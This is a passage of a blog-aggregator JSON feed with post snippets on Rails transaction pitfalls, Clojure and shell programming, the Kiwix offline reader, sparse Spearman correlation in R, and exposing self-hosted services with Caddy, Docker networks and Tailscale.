more to this topic, like Consul Gateways and the multiple kinds of CNIs which tweak how networking happens in the cluster, but those are some really advanced topics that are out of the scope for this post.\nFin!",[],{"slug":1608,"title":1609,"link":1610,"pubDate":1611,"contentSnippet":1612,"tags":1613,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-28","Which Clojure codebases should I read? How and why?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwhich-clojure-codebases-to-read-how-and-why\u002Findex.html","Fri, 29 Apr 2022 00:00:00 +0000","Newcomers to Clojure so frequently ask this question that an FAQ\u002FGuide is being discussed, to add to the Clojure website. I struggled a lot with the question too, when starting off in Clojureland. 
Here are my notes and opinions.",[52,457,54],{"slug":1615,"title":1616,"link":1617,"pubDate":1618,"contentSnippet":1619,"tags":1620,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-29","Shell ain't a bad place to FP: part 2\u002FN: Functions as Unix Tools","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fshell-aint-a-bad-place-to-fp-part-2-functions-as-unix-tools\u002Findex.html","Wed, 27 Apr 2022 00:00:00 +0000","Or, the one in which we hand-craft nano Unix tools using Bash functions.",[1397,1621,456,530],"unix",{"slug":1623,"title":1624,"link":1625,"pubDate":1626,"contentSnippet":1627,"tags":1628,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-30","Why and How I use \"Org Mode\" for my writing and more","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwhy-and-how-i-use-org-mode\u002Findex.html","Tue, 19 Apr 2022 00:00:00 +0000","I find myself telling people that they will have to pry org-mode from my cold dead hands. Which befuddles me. Why, as an ingrate software nerd who has soured on software technology — talk about biting the hand that feeds — do I evince such strong sentiment about a software program?!",[457,54,243,1144,1629,532,1630,1631,246],"org_mode","notebooks","knowledge_management",{"slug":1633,"title":1634,"link":1635,"pubDate":1636,"contentSnippet":1637,"tags":1638,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"postgres-transaction-pitfalls-for-rails-developers-html","Postgres transaction pitfalls for rails developers","https:\u002F\u002Faboobacker.in\u002F2022\u002F04\u002F12\u002Fpostgres-transaction-pitfalls-for-rails-developers.html","2022-04-12T07:02:00.000Z","Rails abstracts a lot of database stuff away using Active Record, which is very convenient. But the convenience can bite back if we are not careful enough.\nHere I am going to list some common mistakes Rails developers make and how to avoid them.\nHaving network calls in Rails after_create\u002Fbefore_create callbacks\nActive Record provides callback methods to perform some operations based on the changes in data. It includes before_create, after_create, after_commit etc. Rails wraps before_create and after_create inside the same transaction so that it can roll back when an exception is raised from any of these callbacks. after_commit is executed after the transaction is committed to the database. So if you have calls like\n\nclass MyModel \u003C ApplicationRecord\n  before_create :fetch_data_from_server\n\n  def fetch_data_from_server\n    self.attribute = SlowApi.new(self).call\n  end\nend\n\n\nthe transaction will remain open for a long time, and that will cause locks and potentially deadlocks on tables.\nSolutions:\n\n1. Make network calls before the transaction begins, i.e. before the save method is called\n\n2. Make the API call in the after_commit callback (see the sketch below)\n\n\nScheduling background jobs from after_create\u002Fbefore_create callbacks\nThis is very similar to the previous point, as background jobs typically use another data store like Redis, and the communication happens over the network. This may not be significant on a small scale if Redis is in the same infra and network latency is low. But any performance degradation on the Redis infra will cause a sudden spike in long transactions and can potentially cause cascading failures across the infrastructure.\nSolutions:\n\n1. Schedule background jobs from the after_commit callback\n2. Move job scheduling out of Rails callbacks\n\n\n
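To make the after_commit solution concrete, here is a minimal sketch (my illustration, not from the original post; SlowApi is the post’s placeholder API client and the attribute name is hypothetical):\n\nclass MyModel \u003C ApplicationRecord\n  # Runs only after the INSERT transaction has committed, so the slow\n  # HTTP call no longer holds a database transaction open.\n  after_commit :fetch_data_from_server, on: :create\n\n  def fetch_data_from_server\n    # update_column writes without callbacks\u002Fvalidations, keeping this\n    # follow-up write short and avoiding re-triggering the callback.\n    update_column(:attribute, SlowApi.new(self).call)\n  end\nend\n\n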
Nested transactions\nWhen you have nested services, you might end up with nested transactions as well.\n\nclass OrderCreator\n  def call\n    Order.transaction do\n      adjust_currency_conversion\n      ...\n      InventoryUpdateService.new.call\n    end\n  end\nend\n\nclass InventoryUpdateService\n  def call\n   Inventory.transaction(requires_new: true) do\n     deduct_inventory_from_primary_store\n     run_inventory_sync\n   end\n  end\nend\n\n\nThis can cause performance bottlenecks due to the SAVEPOINT behaviour. I am skipping the details here, as GitLab wrote a great blog post on this here.\nLast but not least: avoid adding a transaction block where it is not necessary. For instance, if there won’t be any data corruption when the operations run individually, or the impact is minimal and gets fixed on a background worker retry, then avoid using database transactions.\nAlso check out these two great gems, which allow us to reduce the transaction burden on the database:\nafter_commit_everywhere\nisolator",[],{"slug":1643,"title":1644,"link":1645,"pubDate":1646,"contentSnippet":1647,"tags":1648,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fsci-doing-ama-on-reddit","Free Software Community of India will Do 'Ask Me Anything' on Reddit","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffsci-doing-ama-on-reddit\u002F","Sat, 09 Apr 2022 02:01:36 +0530","Free Software Community of India will be doing an ‘Ask Me Anything’ session on the r\u002FIndia subreddit. One of the moderators of r\u002FIndia reached out to us by filling the contact form on the website, as well as in our chat group. As soon as I saw that the person had filled the form, I replied by email. It took some time for the community to arrive at a date and time for conducting the AMA, but now it is finalized: 12 April 2022 17:00 IST.\nAkshay created a Reddit account for FSCI and shared the credentials. Praveen, Akshay, Arya and I will be answering the AMA. Hopefully, this will raise awareness about Free Software in India and the existence of our community. Our community is always in ‘Ask us Anything’ mode because of our welcoming nature and our active lookout for new people to get involved. So if you miss the AMA for some reason, you can just ask us in our chat group. The AMA is just one more way to ask us questions.\nSo, tune into the r\u002FIndia subreddit on 12 April at 5 PM IST. Ask me anything. See you there.",[],{"slug":1650,"title":1651,"link":1652,"pubDate":1653,"contentSnippet":1654,"tags":1655,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"selfish-gene","The Selfish Gene Book Overview","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fselfish-gene\u002F","Fri, 08 Apr 2022 11:39:20 +0530","Yesterday I finished reading The Selfish Gene by Richard Dawkins. The book reminds me of Daniel Kahneman’s Thinking, Fast and Slow, which explores how the human brain makes decisions. In contrast, The Selfish Gene puts forward how genes make decisions and manipulate our decisions for their own benefit, keeping in mind that ‘selfish’ is just a metaphor and a gene has no motive or will of its own. The book presents some very great ideas by other scientists and by the author himself, and for this reason I suggest you read it.\nThe larger the percentage of genes shared by two individuals, the higher the chance of them behaving cooperatively towards each other. 
Each gene in a human body, and in many organisms from the animal kingdom, has a 50% chance of being in any of the person’s siblings. The same goes for the parents, i.e., each gene in a human body has a 50% chance of being in each parent’s body and a 50% chance of being in each offspring’s body. Interesting questions arise from the gene’s point of view: why, then, does a human care more for their offspring than for their siblings? Why is there an asymmetric relationship between parental care towards the offspring and offspring care towards the parent? After all, genetically, the investment in each such individual is the same.\nThe book also asks whether parents should invest equally in all their offspring, and how offspring compete for the resources provided by the parent. Parents also try to minimize their effort and investment in the offspring, and instead try to manipulate their mate into taking more responsibility for the offspring. Why do females have a sudden menopause, while males do not go through such a thing?\nThere are even more interesting questions, such as: why should we look at an organism as a whole unit? Why not consider a pack of wolves a single unit? An organism, like me or you, is made up of complicated parts, each acting somewhat in unity. But what is so special about an organism that we treat it as a single unit? Why did the genes, or replicators, choose to live in complicated bodies like animals?\nThe arguments and the selfishness surrounding them might make you cynical, but the author is optimistic that humans can be taught to be altruistic, and that gives us one more reason to teach children to be altruistic.",[],{"slug":1657,"title":1658,"link":1659,"pubDate":1660,"contentSnippet":1661,"tags":1662,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kiwix-app","How To Read Wikipedia Offline","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkiwix-app\u002F","Thu, 31 Mar 2022 12:56:27 +0530","Recently I came to know about the freedom-respecting Kiwix app, and I found it cool. It is a reader for offline knowledge sources like Wikipedia or Project Gutenberg. There are many projects which you can download for offline reading: AskUbuntu, sections of Wikipedia (like Chemistry, History, Sociology, etc.), RationalWiki (my favorite), TED Talks, Khan Academy, ArchWiki, etc. You can download Wikivoyage and have travel guides for offline reading, as you might not have good internet access on the go. The files are downloaded in the free .zim format, which the Kiwix reader can open. The files are compressed, which saves disk space and internet data while downloading. Further, zim files are easy to index, search, and selectively decompress. Kiwix can also export files into HTML and PDF formats.\nScreenshot of Kiwix Android app.  License: CC-BY-SA-4.0 \n\nThe app is available for download for all the major operating systems– Android, GNU\u002FLinux, iOS, Windows, macOS, Raspberry Pi. In the Android app, you can download content by going to the download section and clicking on the website you would like. For desktop, just download a zim file from the Kiwix library and open it in the Kiwix app. The project also has nice wiki documentation.\nScreenshot of Kiwix app in PureOS, with offline Wikipedia. License: CC-BY-SA-4.0 \n\nThe features make the app very usable for viewing the content offline. 
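(A hedged aside worth showing concretely before going further: kiwix-serve, which ships with the kiwix-tools package - and where the zim file name below is a placeholder - can also serve a downloaded file to other devices over the local network, which is what powers the Raspberry Pi setup mentioned later in this post:\n$ kiwix-serve --port=8080 wikipedia_en_all.zim\nAny browser on the same network can then read it at http:\u002F\u002F\u003Cserver-ip>:8080.)\n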
Having the Wikipedia knowledge in one place, with links resolving to the respective pages inside the same offline collection, makes it very convenient to use. Check the features page for more details.\nAs much as I like offline reading because the internet is a distraction, the other use cases are even better. The zim files can be downloaded and taken to places which are cut off from internet access, and spread knowledge there. Defector NGOs use Kiwix-desktop to smuggle knowledge of the outside world into North Korea, where the internet is almost non-existent and extremely censored. In Ghana, where schools have access to computers but not the internet, a project downloaded Kiwix and the full English Wikipedia and Wiktionary onto a portable hard drive and transferred it to school computer labs. Quoting the project, “Fewer than 10 percent of students had ever accessed Wikipedia before the training took place. Now half the students say the new resource has influenced their studies.”\nYou can use a Raspberry Pi to create a local server from which the downloaded content can be accessed by 25 devices, which is another cool feature.\nWhen I downloaded the 87 GB Wikipedia zim file, I ran into an immediate problem: I couldn’t copy it onto my USB drive because its FAT32 filesystem can’t store files bigger than 4 GB. So I backed up all the data on my USB drive and used this tutorial to format it as exFAT, which supports larger file sizes.\nA drawback in the current form is that incremental updates are not available: if you downloaded Wikipedia on 1 Feb 2022 and now want the changes till date, you cannot fetch just the changes; you need to download from scratch. The project is working on such features.\nI have already started using the Kiwix app almost exclusively for offline reading. Try it, and I am sure you will find something useful for you.\nThe project relies on user donations, so I would like to urge you to support the Kiwix project by making a donation.\nFinally, I leave you with some more screenshots of Kiwix. Enjoy :)\nMe reading the AskUbuntu forum offline on my machine. License: CC-BY-SA-4.0 \n\n\n\nKiwix Desktop homepage. License: CC-BY-SA-4.0 \n\n\n\nReading RationalWiki on Kiwix Android. License: CC-BY-SA-4.0 \n\n\n\nWikimed on Kiwix app. License: CC-BY-SA-4.0",[],{"slug":1664,"title":1665,"link":1666,"pubDate":1667,"contentSnippet":1668,"tags":1669,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-31","n ways to FizzBuzz in Clojure","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fn-ways-to-fizzbuzz-in-clojure\u002Findex.html","Fri, 25 Mar 2022 00:00:00 +0000","FizzBuzz is everywhere. Every programmer passes through its rite of passage, or at least bears witness to another. Over the years, many gentlenerds have taken it upon themselves to discover ever new ways to incant those hoary symbols. I hereby enjoin these few drops of Clojure to that roiling ocean of FizzBuzzery.",[52,456,457,49],{"slug":1671,"title":1672,"link":1673,"pubDate":1674,"contentSnippet":1675,"tags":1676,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-32","Shell ain't a bad place to FP: part 1\u002FN: McIlroy's Pipeline","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fshell-aint-a-bad-place-to-fp-part-1-doug-mcilroys-pipeline\u002Findex.html","Fri, 11 Mar 2022 00:00:00 +0000","Or, the one in which we \"take apart\" Douglas McIlroy's pipeline from 1986. 
Doing so teaches an object lesson about the essence of modular, composable, functional architecture.",[1397,1621,456,530],{"slug":1678,"title":1679,"link":1680,"pubDate":1681,"contentSnippet":1682,"tags":1683,"maintainerName":982,"maintainerUsername":983,"maintainerPhoto":984,"feedUrl":985},"fast-sparsespearman","Fast &amp; memory efficient spearman correlation on sparse matrices","https:\u002F\u002Fsaket-choudhary.me\u002Fblog\u002F2022\u002F03\u002F10\u002Ffast-sparsespearman\u002F","2022-03-09T18:30:00.000Z","The previous post formulated a solution for calculating spearman correlation\non sparse matrices. The trick was simple - we exploited the sparsity structure in our matrix to prevent it from being converted to a dense form at any step. For spearman correlation, following this line of thought\nis tricky, because the ranks are not sparse, at least not by default. We then used the property of covariance, where adding a constant quantity to all entries of a vector (or matrix) does not change \nits variance (or covariance) structure, to come up with a solution that works great in theory and solves our purpose of keeping the memory footprint low. \nA notebook with an implementation is here.\nHowever, the time benchmarks look awful - though we ended up saving memory, SparseSpearmanCor() was at least 2 times slower than the naive approach of densifying the matrix\nand calculating correlation using cor(as.matrix(X.sparse), method=\"spearman\"). This in practice defeats the motivation - we are saving memory at the cost of speed.\nSolution \nThe costliest step in my original implementation of SparseSpearmanCor() was a simple lookup operation:\n which(j == column) ,\nwhere I fetch the non-zero entries of a column for calculating the rank; this happens for every column (j stores the column indices where there are non-zero entries).\nI tried other ways of making this faster, such as by using fastmatch. But the actual\nspeedup came from a simple thought - if we care about the non-zero entries, I should just deal with them separately. So instead of doing repeated\nlookups, I just separate the non-zero entries out, do the rank sparsification operations on them, and put them back into the sparse matrix. \nI call this implementation SparseSpearmanCor2() and you can find the implementation in the notebook, but here are some comparisons with \nthe dense approach and the previous implementation SparseSpearmanCor().\nThe result is a function that calculates values 10x faster than any approach on large matrices (10000 x 5000):\nFigure 1. Time benchmarks. 
SparseSpearmanCor2() and the time benchmarks are available in this notebook.",[],{"slug":1685,"title":1686,"link":1687,"pubDate":1688,"contentSnippet":1689,"tags":1690,"maintainerName":982,"maintainerUsername":983,"maintainerPhoto":984,"feedUrl":985},"sparsespearman","Memory efficient spearman correlation on sparse matrices","https:\u002F\u002Fsaket-choudhary.me\u002Fblog\u002F2022\u002F03\u002F09\u002Fsparsespearman\u002F","2022-03-08T18:30:00.000Z","An important property of the covariance function is that it is invariant under shifts, i.e., for any two random variables $\mathbf{X}$ and $\mathbf{Y}$, you get the same covariance if you add constant quantities to either $\mathbf{X}$ or $\mathbf{Y}$:\n$$\text{Cov}(\mathbf{X} + a, \mathbf{Y} + b) = \text{Cov}(\mathbf{X}, \mathbf{Y})$$\nwhere $\text{Cov}(\mathbf{X}, \mathbf{Y}) = \mathbb{E}[(\mathbf{X} - \mathbb{E}[\mathbf{X}])(\mathbf{Y} - \mathbb{E}[\mathbf{Y}])]$ and $a, b$ are real valued quantities.\nEssentially, $\text{Cov}(\mathbf{X}, \mathbf{Y})$ is a measure of the product of how much $\mathbf{X}$ and $\mathbf{Y}$ deviate from their respective means, so adding a constant does not change anything (because the deviation from the mean remains the same).\nTwo commonly used correlations are pearson and spearman. A pearson correlation is essentially a normalized measure of covariance, which tries to measure how “linearly dependent” $\mathbf{X}$ and $\mathbf{Y}$ are:\n$$\text{Cor}(\mathbf{X} + a, \mathbf{Y} + b) = \frac{\text{Cov}(\mathbf{X}, \mathbf{Y})}{\sigma_X \sigma_Y}, \qquad \sigma^2_X = \mathbb{E}[(X-\mathbb{E}[X])^2], \qquad \sigma^2_Y = \mathbb{E}[(Y-\mathbb{E}[Y])^2].$$\nThe spearman correlation, on the other hand, assesses whether the relationship between $\mathbf{X}$ and $\mathbf{Y}$ is monotonic (either increasing or decreasing). It is equivalent to running pearson correlation on the ranks of the values in $X$ and $Y$ instead of the actual values themselves. So it essentially asks: if $X$ is increasing (decreasing), are the values in $Y$ increasing (decreasing) as well? A perfect score of 1 (-1) is a yes (no). Both types of correlation are often employed in genomics to assess the relationship between two variables of interest.\nOne particular context where correlations are employed is multi-omics experiments, say where we are profiling RNA and open chromatin regions (ATAC) in the same cells. For example, \na recent study used correlations to find potential gene-enhancer links (Ma et al., 2020). The idea is simple: we have a bunch of cells\nin which we simultaneously profiled both the transcriptome (RNA) and the open chromatin regions (ATAC). We then ask, for each gene, which open chromatin regions are highly correlated with it (after \nnecessary adjustment for background) to predict potential gene-enhancer links. The default correlation function in R, \n cor(RNA, ATAC, method=\"pearson\")  or cor(RNA, ATAC, method=\"spearman\") , would ideally be sufficient to do this.  
Here, RNA and ATAC \nare vectors of equal length with entries summarizing the transcriptome signal and ATAC signal at a gene and potential enhancer, respectively.\nHowever, both the RNA and ATAC matrices are often sparse matrices, i.e. they have lots of entries that are zeroes,\nwhich are not explicitly stored, to save space. The default cor() method does not work on sparse matrices. The naive fix is simple: convert the RNA and ATAC sparse matrices to usual (dense) matrices using as.matrix()\nand run the correlation function. However, converting to the dense matrix format will take loads of memory, especially if you are searching for links between 10,000 genes and say only about 5,000\npotential enhancers in around 10,000 cells all at once, in parallel.\nSparsity makes it easier \nThe solution to avoid this is rather easy and has been previously discussed for pearson correlation.\nA detailed description is available in the documentation of qlcMatrix::corSparse(). \nBut in short, the idea is to utilize the sparsity of a vector and avoid doing operations that would make a sparse matrix dense. The essential idea is that we do not want to lose the sparsity\nstructure during our calculations. For example, for a sparse vector, if we are interested in calculating the variance $\text{Var}(X) = \mathbb{E}[(X-\mathbb{E}[X])^2]$ and we do the $X-\mathbb{E}[X]$ operation first,\nthe sparsity structure of $X$ is destroyed and we land up with a dense vector. Instead, we can use the fact that the variance can equivalently be written as $\text{Var}(X) = \mathbb{E}[X^2] - \mathbb{E}[X]^2$, retaining the sparsity\nthroughout. That solves our problem of calculating pearson correlation on sparse vectors (or matrices).\nThe next question then is: what about sparse matrices and spearman correlation? cor(X, Y, method=\"spearman\")  does not work for sparse matrices, and we do not want to convert them to dense form.\nThe solution is again simple, but took me a while to figure out. A naive idea would be to use the definition of spearman correlation - calculate the ranks of $X$ and $Y$ and then run them through cor()\nwith method=\"spearman\". The problem however is again the same - the rank matrix is not sparse. But if you think about the ranks in a sparse matrix, they do have some\ninteresting properties that we can utilize to make them sparse.\nWe can look at a sparse vector for an example. Consider a vector  y \u003C- c(0,0,0,42,21,10)  with 3 non-zero entries. We will use $n_z$ to denote the number of non-zero\nentries in a vector, and $n_0$ to denote the number of zero entries (in this example both happen to be 3). If we know the number of zero entries, we also know what their ranks are going to be - they are fixed. \nFor a vector with $n_0$ zero entries, the rank(ties.method=\"average\") method will set them all to $\frac{1}{n_0}\sum_{i=1}^{n_0} i = \frac{(n_0+1)}{2}$. We also know that the lowest non-zero entry in such a vector would have a\nrank of $(n_0+1)$. For example, the rank vector  rank(y) = c(2,2,2,6,5,4)  - by default the ranks of tied entries are averaged. So the rank of the 0s is $\frac{1+2+3}{3}= \frac{(n_0+1)}{2} = 2$. Our rank vector \nis not sparse, but we can make it sparse again if we subtract $\frac{(n_0+1)}{2}$ from each of the entries. Since a shift operation will not change the (co)variance, the variance of \nc(0,0,0,4,3,2) , which we called the “sparsified rank vector”, is the same as that of the original rank vector c(2,2,2,6,5,4). 
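To make the destination concrete, here is a small R sketch of the whole transformation (my illustration; the helper name sparsify_rank is made up, and it uses the $\frac{(n_0-1)}{2}$ shift derived just below):\nsparsify_rank \u003C- function(y) {\n  nz \u003C- y != 0                          # positions of non-zero entries\n  n0 \u003C- sum(!nz)                        # number of zero entries\n  r \u003C- numeric(length(y))               # zeros keep a (shifted) rank of 0\n  r[nz] \u003C- rank(y[nz]) + (n0 - 1) \u002F 2   # shift the ranks of non-zero entries\n  r\n}\nsparsify_rank(c(0, 0, 0, 42, 21, 10))   # 0 0 0 4 3 2\n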
So we should aim to get this “sparsified rank” vector somehow.\nThe trick to arrive at the “sparsified rank” vector is to calculate ranks on only the non-zero entries of our vector. We forget about the zero entries and focus on the non-zero entries alone - they are few, and it is fast to calculate ranks for just these. \nIn this version of the vector (where there are no zeros), the lowest non-zero entry has a rank of $1$ (assuming there are no ties, but the following arguments hold without loss of generality). To arrive at the “sparsified rank” vector,\nwe subtracted $\frac{(n_0+1)}{2}$ from the original rank vector, so the lowest non-zero entry’s rank will now be $n_0 + 1 - \frac{(n_0+1)}{2} = 1 + \frac{(n_0-1)}{2}$, which is equivalent to adding $\frac{(n_0-1)}{2}$ to the ranks of the \nnon-zero entries! This way, we retain the sparsity in the ranks and can then just use corSparse() to calculate pearson correlation on the sparsified rank vectors, resulting in spearman correlation.\nWhile this approach is memory efficient, it unfortunately is not always the fastest. See this notebook for some time benchmarks. I did not explicitly\nperform memory benchmarks.\nUpdate:  The approach is both memory efficient and fast. See the updated post and associated notebook\nExample\n y \u003C- c(0,0,0,42,21,10) \n rank(y) = c(2,2,2,6,5,4) \n sparsified_rank(y) \u003C- c(0,0,0,4,3,2)  (Subtract $\frac{(n_0+1)}{2}=2$ from all entries to make the previous vector a sparse vector)\n rank(y[y!=0]) = rank(c(42,21,10)) = c(3,2,1) .\nIf we now add $\frac{(n_0-1)}{2} = \frac{(3-1)}{2} = 1$ to all the entries of the last vector, we get  c(4,3,2) , which are the non-zero ranks\nfrom our sparsified_rank vector, which will be the input to corSparse().
YAMO.","https:\u002F\u002Fnadh.in\u002Fblog\u002Ffomo-yamo\u002F","Wed, 02 Mar 2022 00:00:00 +0000","A whole new way of seamlessly “hydrating” and building “reactive” webpages, proclaim the dozen new Javascript frameworks that offer slightly different ways of manipulating DOM; new stacks for generating static webpages from templates; new ways of deploying “no-code” apps to “serverless edges”; memory-safe languages that enable error-free programs; NoSQL databases that offer unlimited scalability; CSS frameworks that forever change how webpages are styled; new paradigms of visualizing programs as containers and not processes, container orchestration and not process management; functional programming over imperative over object oriented; “AI\u002FML” for whatever one pleases … magic bullets for everything.",[],{"slug":1706,"title":1707,"link":1708,"pubDate":1709,"contentSnippet":1710,"tags":1711,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"indian-pirates-membership","Announcement: Became a Member of Indian Pirates","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Findian-pirates-membership\u002F","Tue, 01 Mar 2022 00:00:00 +0000","I am happy to announce that I became a permanent member of Indian Pirates a few days ago. Indian Pirates is a decentralized group which aims to be a political party someday and contest elections to form a government. I hope to bring some change politically to improve our lives. The group seeks long-term change, which means we are not thinking that we will change the world in a day or in one year, but rather trying to understand the roots of the problems in society and how it is structured, and to solve the problems at the root itself.\nThis is only an announcement post and I want to keep it short. Goodbye, and see you in the next post.",[],{"slug":1713,"title":1714,"link":1715,"pubDate":1716,"contentSnippet":1717,"tags":1718,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-34","Dismal Arithmetic in Dyalog APL and Clojure","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fdismal-arithmetic-dyalog-apl-clojure\u002Findex.html","Fri, 25 Feb 2022 00:00:00 +0000","Dismal arithmetic is just like the arithmetic you learned in school, only simpler: there are no carries, when you add digits you just take the largest, and when you multiply digits you take the smallest. How does code look in the two languages I like a lot; Clojure and APL?",[52,1719,456,49],"apl",{"slug":1721,"title":1722,"link":1723,"pubDate":1724,"contentSnippet":1725,"tags":1726,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-35","Shell ain't a bad place to FP: part 0\u002FN: Introduction","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fshell-aint-a-bad-place-to-fp-part-0-intro\u002Findex.html","Wed, 23 Feb 2022 00:00:00 +0000","Or, *Supremely Functional Bash Programming*, an exploration in N parts...",[1397,1621,456,530],{"slug":1728,"title":1729,"link":1730,"pubDate":1731,"contentSnippet":1732,"tags":1733,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-36","What makes Functional Programs and Systems \"Functional\"?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwhat-makes-functional-programming-systems-functional\u002Findex.html","Tue, 22 Feb 2022 00:00:00 +0000","In which we ponder the Functional Nature of Life, The Universe, and Everything. 
Please feel free to follow through the weeds, or jump straight to the bottom for my 2 nano BTC on the matter. (Or my current state of mind, at any rate.)",[55,456,530,723],{"slug":1735,"title":1736,"link":1737,"pubDate":1738,"contentSnippet":1739,"tags":1740,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-37","Baby don't hurry, don't stop (feat. Melancholy)","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fdont-hurry-dont-stop-sad-version\u002Findex.html","Mon, 14 Feb 2022 00:00:00 +0000","Here lies melancholy that I put to paper from a particularly deep hole, not too long ago. It may ruin your day, or it may make you feel a little bit understood about your dark moments. Your mileage will vary.",[55,1741],"mentalhealth",{"slug":1743,"title":1744,"link":1745,"pubDate":1746,"contentSnippet":1747,"tags":1748,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-38","people > culture > values > strategy > technology","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fpeople-culture-values-strategy-technology\u002Findex.html","Fri, 11 Feb 2022 00:00:00 +0000","Technology is—and ought to be—the \u002Fbyproduct\u002F of far more important, powerful, and deep-rooted aspects of organisations — including wholesale societies. The pandemic of technology-solutionism gleefully embraced and amplified by all and sundry makes me believe that people seem to have decided it's the other way around.",[50,723,53],{"slug":1750,"title":1751,"link":1752,"pubDate":1753,"contentSnippet":1754,"tags":1755,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-39","Poor man's Reader App with Pandoc & Bash","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Freader-app-pandoc-bash\u002Findex.html","Thu, 10 Feb 2022 00:00:00 +0000","Every so often, I want to avoid opening a website in a browser, for ... reasons.",[456,1397,1621,49],{"slug":1757,"title":1758,"link":1759,"pubDate":1760,"contentSnippet":1761,"tags":1762,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"exposing-services","How I expose services while self hosting","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fexposing-services\u002F","2022-02-10T00:00:00.000Z","I’ve often been asked how to expose public and private services running on DigitalOcean droplets\u002FRPis when self hosting apps. Most people don’t have access to a static IP for their RPis. I felt I’d summarize my approach to this in this blog post and hope it’ll be useful for others trying to do the same.\nTools I use#\nTailscale: I love this and I’ve written about it in the past. I am one of the early adopters, having used it for 2 years now, and while it could be replaced with the similar WireGuard-based mesh services that have popped up recently, I still like the UX of this application a lot. In simpler words, it just works!\nCaddy: I use Caddy as a webserver to host some static websites and as a reverse proxy for all the applications I’ve deployed. It makes the SSL setup a breeze, and the config is nice to read as well. There’s nothing not to like about Caddy if you’re not in the business of dealing with super high concurrent traffic on your website (in which case NGINX\u002FHAProxy\u002FEnvoy et al might be worth looking at). 
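To give a flavour of that config, here is a minimal, hypothetical Caddyfile (the hostname and upstream are placeholders, not my real setup):\nblog.example.org {\n    # Caddy obtains and renews the TLS certificate automatically\n    reverse_proxy app:8000\n}\n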
I’ve never used Traefik myself, and while I know it makes routing simple with Docker labels, I think my current approach with Caddy is similar and easier for me to use without having to learn a new config.\nDocker: All the services are containerized, and I make special use of Docker networks, which I’ll show in the post.\nSetup Overview#\n\nI use 2 instances of Caddy for my setup:\nPublic: This is to reverse proxy all the public-facing websites.\nPrivate: This is to reverse proxy all the internal websites.\nThe docker-compose looks like this:\nversion: \"3.7\"\n\nservices:\n  caddy_public:\n    ...\n    ports:\n      - \"\u003Cdo_floating_ip>:80:80\"\n      - \"\u003Cdo_floating_ip>:443:443\"\n    networks:\n      - public\n    ...\n\n  caddy_internal:\n    ...\n    ports:\n      - \"100.111.91.100:80:80\"\n      - \"100.111.91.100:443:443\"\n    networks:\n      - internal\n    ...\n\nnetworks:\n  public:\n    name: caddy_public\n  internal:\n    name: caddy_internal\nThis is where most of the magic lies. I use 2 Docker networks, caddy_public and caddy_internal. Both of these networks are configured as bridge networks. Containers connected to the same bridge network can even reach each other using internal DNS.\nThe published ports section is the important one here.\nIn the internal Caddy instance, TCP port 80 in the container is mapped to port 80 on the Docker host for connections to host IP 100.111.91.100 (this is a private IP and belongs to the CGNAT space). The same is done for caddy_public, where the Floating IP of the DigitalOcean droplet is used instead of the Tailscale IP.\nNext comes the part where we’ll attach these networks to our applications. docker-compose by default creates a user-defined bridge network if you leave networks unspecified. However, if you want more granular control, you can specify the networks in the Compose spec itself.\nHere’s an example of the Plausible compose spec, which is exposed publicly:\n  plausible_events_db:\n    image: yandex\u002Fclickhouse-server:21.3.2.5\n    networks:\n      - plausible\n\n  plausible:\n    image: plausible\u002Fanalytics:latest\n    networks:\n      - web\n      - plausible\n\nnetworks:\n  web:\n    name: caddy_public\n    external: true\n  plausible:\n    name: plausible\nHere you can see that the ClickHouse container is only attached to the plausible network. This plausible network is scoped to just the services defined in this file.\nWe can exec inside the caddy_public container, look up the IP of plausible, and verify that the network is correctly configured and reachable:\n$ host plausible\nplausible has address 172.20.0.3\n$ curl plausible:8000\n\u003Chtml>\u003Cbody>You are being \u003Ca href=\"\u002Flogin\">redirected\u003C\u002Fa>.\u003C\u002Fbody>\u003C\u002Fhtml>\u002Fsrv # \nSome notes on this setup:\nYou’ll also note that I haven’t published port 8000 anywhere. Publishing is only required if you want to forward the traffic from your host network to the docker network (via the bridge). 
